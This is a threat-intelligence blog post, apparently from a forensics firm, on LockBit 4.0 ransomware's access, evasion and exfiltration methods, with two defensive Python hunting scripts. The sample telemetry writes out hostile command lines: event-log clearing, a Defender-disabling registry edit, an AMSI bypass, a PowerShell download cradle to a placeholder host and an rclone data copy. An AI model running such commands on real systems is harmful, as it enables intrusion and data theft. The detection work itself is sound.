Key takeaways:
- LockBit 4.0 is the latest iteration of a notorious ransomware-as-a-service (RaaS) family that has been active since 2019.
- It poses a significant threat due to its enhanced stealth, adaptability, and sophisticated attack mechanisms.
- The July 2025 variant further includes fully polymorphic code.
The notorious LockBit ransomware group is back and more dangerous than ever. Following a brief disruption by the international law enforcement “Operation Cronos” in early 2024, the group has resurfaced with LockBit 4.0. Released around February 2025, it’s a significant evolution designed for maximum stealth, damage, and resilience. This new version incorporates advanced evasion techniques that make detection incredibly difficult.
LockBit 4.0 ransomware overview
LockBit has long dominated the ransomware landscape, operating on a highly effective Ransomware-as-a-Service (RaaS) model. It functions like a dark-web tech startup, providing its malware and infrastructure to “affiliates” who carry out attacks.
The ransomware is cross-platform, with custom builders capable of targeting Windows, Linux, and VMware ESXi environments, making it a threat to virtually any corporate network.
Common methods LockBit 4.0 uses to gain initial access within a network
LockBit 4.0, like its predecessors, employs a variety of common cyberattack methods to gain initial access to an organization’s systems and then propagate internally. These methods often exploit human vulnerabilities or technical weaknesses.
Phishing emails
Social engineering through phishing is a primary method. Attackers send malicious emails containing links or attachments that, when clicked or opened, execute the ransomware payload or a modified PowerShell script that initiates the attack chain.

Exploiting system vulnerabilities
LockBit often takes advantage of unpatched vulnerabilities in widely used software, applications, or internet-exposed services. This could include vulnerabilities in operating systems, enterprise applications, or network infrastructure.
Since so many intrusions begin with an unpatched vulnerability, timely system patching must be a basic step in every cybersecurity plan.
Remote Desktop Protocol (RDP)
Attackers can brute-force RDP credentials or exploit vulnerabilities in RDP services to gain remote access.
Lateral movement, privilege escalation, and defense evasion techniques
Once initial access is gained, LockBit 4.0 utilizes several techniques to move laterally, elevate privileges, and evade detection:
Living Off The Land Binaries (LoLBins)
The ransomware heavily relies on legitimate system tools and binaries native to the operating system (e.g., PowerShell, SMB, net.exe, taskkill.exe, wmic.exe). This makes its activities appear “normal” and harder to detect, as it avoids introducing new, easily identifiable malicious files.
PowerShell abuse
A modified PowerShell script is often the initial executor, deploying a malicious DLL payload. It also abuses PowerShell for downloading and executing files.
Privilege escalation
LockBit uses tools like Mimikatz to obtain escalated privileges, and also adds accounts to privileged security groups and applies UAC (User Account Control) bypass techniques.
Disabling security features
LockBit 4.0 is designed to disable security features like AMSI (Antimalware Scan Interface) in PowerShell and can manipulate registry keys to disable Microsoft Defender Antivirus. It also runs wevtutil to clear event logs for defense evasion.
Data exfiltration
Before encryption, LockBit exfiltrates sensitive information for its double-extortion scheme, often using tools like Rclone or MegaCMD, command-line utilities for moving files between local storage and a wide range of cloud storage services.
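The behaviours listed in this section (LoLBin use, PowerShell download cradles and AMSI tampering, local-admin group additions, Defender registry tampering, wevtutil log clearing, and Rclone/MEGAcmd runs) are what a behavioural hunt should key on. The following Python example is added here and is not Proven Data's code: it evaluates a small rule set against constructed process-creation records shaped like Sysmon Event ID 1 / Security 4688 fields, then reports hosts where several distinct behaviours fire together. Host names, PIDs, command lines, rule names and the two-rule threshold are assumptions for illustration.

```python
"""Behaviour-based hunt over process-creation events (added example, not Proven Data's
code). The events below are constructed to resemble Sysmon EventID 1 / Security 4688
fields; host names, PIDs, rule names and thresholds are assumptions."""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Iterable


@dataclass(frozen=True)
class ProcessEvent:
    host: str
    pid: int
    image: str          # full path of the started executable
    command_line: str
    parent_image: str


@dataclass(frozen=True)
class Finding:
    host: str
    pid: int
    rule: str
    command_line: str


# rule name -> (regex on the image file name, regex on the command line); both are
# matched case-insensitively. The behaviours mirror those described in the post.
RULES: dict[str, tuple[str, str]] = {
    # wevtutil cl <log>: event-log clearing for defence evasion
    "event-log-clearing": (r"^wevtutil(\.exe)?$", r"\bcl\b"),
    # reg add ... DisableAntiSpyware / DisableRealtimeMonitoring: Defender policy tampering
    "defender-disable-via-registry": (r"^reg(\.exe)?$", r"DisableAntiSpyware|DisableRealtimeMonitoring"),
    # PowerShell command lines that reference AMSI internals
    "amsi-tamper-powershell": (r"^(powershell|pwsh)(\.exe)?$", r"AmsiUtils|amsiInitFailed|AmsiScanBuffer"),
    # PowerShell download-and-execute cradles
    "powershell-download-cradle": (r"^(powershell|pwsh)(\.exe)?$",
                                   r"DownloadString|DownloadFile|Invoke-WebRequest|\bIEX\b|Invoke-Expression"),
    # rclone / MEGAcmd moving data to cloud storage (exfiltration staging)
    "cloud-sync-tool-use": (r"^(rclone|megacmd|mega-put|mega-cmd)(\.exe)?$", r"\b(copy|sync|move|put)\b"),
    # net localgroup administrators <user> /add: privilege escalation via group membership
    "local-admin-group-addition": (r"^net1?(\.exe)?$", r"localgroup\s+administrators\s+\S+\s+/add"),
}


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1]


def match_event(ev: ProcessEvent) -> list[str]:
    """Return the names of every rule this event satisfies."""
    name = _basename(ev.image)
    return [rule for rule, (img_re, cmd_re) in RULES.items()
            if re.search(img_re, name, re.I) and re.search(cmd_re, ev.command_line, re.I)]


def hunt(events: Iterable[ProcessEvent]) -> list[Finding]:
    return [Finding(ev.host, ev.pid, rule, ev.command_line)
            for ev in events for rule in match_event(ev)]


def hosts_with_chain(findings: Iterable[Finding], min_rules: int = 2) -> dict[str, set[str]]:
    """Hosts on which at least `min_rules` distinct behaviours fired. One rclone job on a
    backup server is expected noise; log clearing plus Defender tampering plus rclone on
    a workstation is the post-compromise chain the post describes."""
    by_host: dict[str, set[str]] = defaultdict(set)
    for f in findings:
        by_host[f.host].add(f.rule)
    return {h: rules for h, rules in by_host.items() if len(rules) >= min_rules}


# Constructed sample telemetry (assumed hosts/paths). WS-01 shows the full chain, FS-02 is a
# backup server with a legitimate rclone job, and two benign admin commands are included.
_CMD = r"C:\Windows\System32\cmd.exe"
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcessEvent("WS-01", 4120, r"C:\Windows\System32\wevtutil.exe", "wevtutil.exe cl Security", _CMD),
    ProcessEvent("WS-01", 4133, r"C:\Windows\System32\reg.exe",
                 r'reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f', _CMD),
    ProcessEvent("WS-01", 4150, _PS, 'powershell.exe -nop -w hidden -c "[Ref].Assembly.GetType(...AmsiUtils...).GetField(...amsiInitFailed...)"', _CMD),
    ProcessEvent("WS-01", 4162, _PS, 'powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(\'http://placeholder.invalid/stage.ps1\')"', _CMD),
    ProcessEvent("WS-01", 4201, r"C:\Users\Public\rclone.exe", r"rclone.exe copy C:\Finance remote:staging --transfers 8", _CMD),
    ProcessEvent("WS-01", 4210, r"C:\Windows\System32\net.exe", "net.exe localgroup administrators svc_backup /add", _CMD),
    ProcessEvent("WS-01", 4300, r"C:\Windows\System32\wevtutil.exe", "wevtutil.exe qe System /c:10 /f:text", _PS),   # benign query
    ProcessEvent("WS-01", 4310, _PS, r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1", _CMD),  # benign script
    ProcessEvent("FS-02", 1802, r"C:\Tools\rclone.exe", r"rclone.exe sync D:\Backups offsite:nightly --bwlimit 10M", _CMD),
]

if __name__ == "__main__":
    results = hunt(SAMPLE_EVENTS)
    for f in results:
        print(f"{f.host} pid={f.pid} [{f.rule}] {f.command_line[:70]}")
    print("hosts with a behaviour chain:", hosts_with_chain(results))
```

The two-rule threshold is the point of the example: each rule on its own is noisy on a real estate (backup servers run rclone, admins query event logs), but several distinct behaviours on one host inside a short window is the pattern worth paging on.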
LockBit 4.0 evolution
The July 2025 variant introduces fully polymorphic code, meaning the malware’s signature changes with every deployment, rendering traditional signature-based antivirus solutions obsolete. It also features sandbox detection, allowing it to identify virtual analysis environments and halt execution to prevent security researchers from studying it.
"LockBit 4.0’s ability to bypass EDRs, disable telemetry like ETWTI, and employ advanced obfuscation methods isn’t just an evolution - it’s a clear reminder that traditional defenses aren’t enough. Today, every incident has to be treated as an assumed breach, and response speed is critical to limiting impact."
Hassan Faraz, Proven Data Forensics Expert
After execution, the ransomware deletes itself from the disk to frustrate forensic analysis and cover its tracks.
LockBit 4.0’s evolution provides clear, non-negotiable takeaways for modern defense:
- Defense must be behavioral. Organizations need Endpoint Detection and Response (EDR) and Extended Detection and Response (XDR) solutions that can identify malicious actions (like AMSI bypasses or DLL unhooking), not just files.
- You must shift from passive defense to proactive threat hunting. Security teams should be actively monitoring for behavioral indicators, such as the use of tools like Rclone or MegaCMD, large outbound data streams, and suspicious PowerShell activity.
- Your backups must be protected. The 3-2-1 backup rule is no longer enough. The “1” (offline copy) must be truly offline or immutable. Network-attached backups are simply another target.
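The “large outbound data streams” indicator in the second takeaway above is easiest to hunt with a per-host baseline rather than a fixed global threshold. The Python below is an added example and not Proven Data's code: it buckets constructed proxy/flow records by host and hour, compares each hour against the host's median from its other hours, and reports the dominant destination of any spike. Host names, destination names, the 10× ratio and the 500 MiB floor are assumptions to be tuned per environment; the allowlist models known backup targets.

```python
"""Per-host outbound-volume baseline for exfiltration hunting (added example, not
Proven Data's code). Flow records, hosts, destinations and thresholds are constructed."""
from __future__ import annotations

from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from statistics import median
from typing import Iterable

MiB = 2 ** 20


@dataclass(frozen=True)
class Flow:
    ts: datetime
    src_host: str
    dst: str        # destination name as seen in proxy or DNS logs
    bytes_out: int


def hour_bucket(ts: datetime) -> datetime:
    return ts.replace(minute=0, second=0, microsecond=0)


def outbound_by_hour(flows: Iterable[Flow], allowlist: frozenset[str]):
    """host -> hour -> total bytes, plus host -> hour -> dst -> bytes, skipping allowlisted dsts."""
    totals: dict[str, dict[datetime, int]] = defaultdict(lambda: defaultdict(int))
    per_dst: dict[str, dict[datetime, dict[str, int]]] = defaultdict(
        lambda: defaultdict(lambda: defaultdict(int)))
    for f in flows:
        if f.dst in allowlist:
            continue
        b = hour_bucket(f.ts)
        totals[f.src_host][b] += f.bytes_out
        per_dst[f.src_host][b][f.dst] += f.bytes_out
    return totals, per_dst


def exfil_candidates(flows: Iterable[Flow], allowlist: frozenset[str] = frozenset(),
                     ratio: float = 10.0, min_bytes: int = 500 * MiB) -> list[dict]:
    """Flag an hour when a host sent at least `min_bytes` AND at least `ratio` times the
    median of its other hours. With no other hours (no history) only the floor applies."""
    totals, per_dst = outbound_by_hour(flows, allowlist)
    hits = []
    for host, buckets in totals.items():
        for b, total in sorted(buckets.items()):
            others = [v for k, v in buckets.items() if k != b]
            baseline = median(others) if others else 0
            if total >= min_bytes and total >= ratio * max(baseline, 1):
                dst, dst_bytes = max(per_dst[host][b].items(), key=lambda kv: kv[1])
                hits.append({"host": host, "hour": b, "bytes_out": total,
                             "baseline": baseline, "top_dst": dst, "top_dst_bytes": dst_bytes})
    return hits


# Constructed sample flows: six hourly buckets starting at an assumed time.
T0 = datetime(2025, 7, 14, 8, 0)


def _hourly(host: str, dst: str, per_hour: list[int]) -> list[Flow]:
    return [Flow(T0 + timedelta(hours=i, minutes=7), host, dst, n) for i, n in enumerate(per_hour)]


SAMPLE_FLOWS = (
    # WS-01: normal CRM traffic, then a 3.2 GiB burst to an unknown external store
    _hourly("WS-01", "crm.corp.example", [20 * MiB, 18 * MiB, 22 * MiB, 25 * MiB, 19 * MiB, 21 * MiB])
    + [Flow(T0 + timedelta(hours=5, minutes=30), "WS-01", "ext-storage.example", 3200 * MiB)]
    # FS-02: quiet all day, then the nightly backup job to the known backup target
    + _hourly("FS-02", "backup.corp.example", [5 * MiB] * 5 + [4000 * MiB])
    # WS-03: ordinary mail traffic only
    + _hourly("WS-03", "mail.corp.example", [30 * MiB, 35 * MiB, 28 * MiB, 40 * MiB, 33 * MiB, 31 * MiB])
)
ALLOWLIST = frozenset({"backup.corp.example"})

if __name__ == "__main__":
    for h in exfil_candidates(SAMPLE_FLOWS, ALLOWLIST):
        print(f"{h['host']} {h['hour']:%Y-%m-%d %H:00}: {h['bytes_out'] // MiB} MiB out "
              f"(baseline {h['baseline'] // MiB} MiB), mostly to {h['top_dst']}")
```

Without the allowlist the backup server's nightly job is also flagged, which is the expected false positive; the allowlist is how known, sanctioned bulk transfers are removed so the remaining hits (a workstation pushing gigabytes to an unfamiliar destination) are worth a call to the responder.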
Mitigation and incident response
Given LockBit 4.0’s advanced stealth, the focus must shift from simple prevention to robust, multi-layered defense and, most importantly, rapid, expert-led response. Here are the three basic rules for responding to a LockBit cyberattack:
- Contain and do not reboot
Immediately isolate the affected systems. Unplug them from the network (both Ethernet and Wi-Fi) to stop the ransomware from spreading. Do not reboot or shut down, as this can destroy forensic evidence in memory.
- Do not pay
Law enforcement, the FBI, and cybersecurity experts strongly advise against paying the ransom. It does not guarantee you’ll get your data back, and it funds future criminal activity.
- Call for help
A sophisticated attack like LockBit 4.0 is not a DIY fix. You need a professional response to contain the breach, assess the damage, and eradicate the threat. If your organization has been compromised, contact Proven Data’s DFIR Incident Response team immediately for 24/7 emergency assistance.
If your data or your backups have been encrypted, our specialists may still be able to help. Proven Data’s ransomware recovery services have successfully recovered data from hundreds of catastrophic attacks.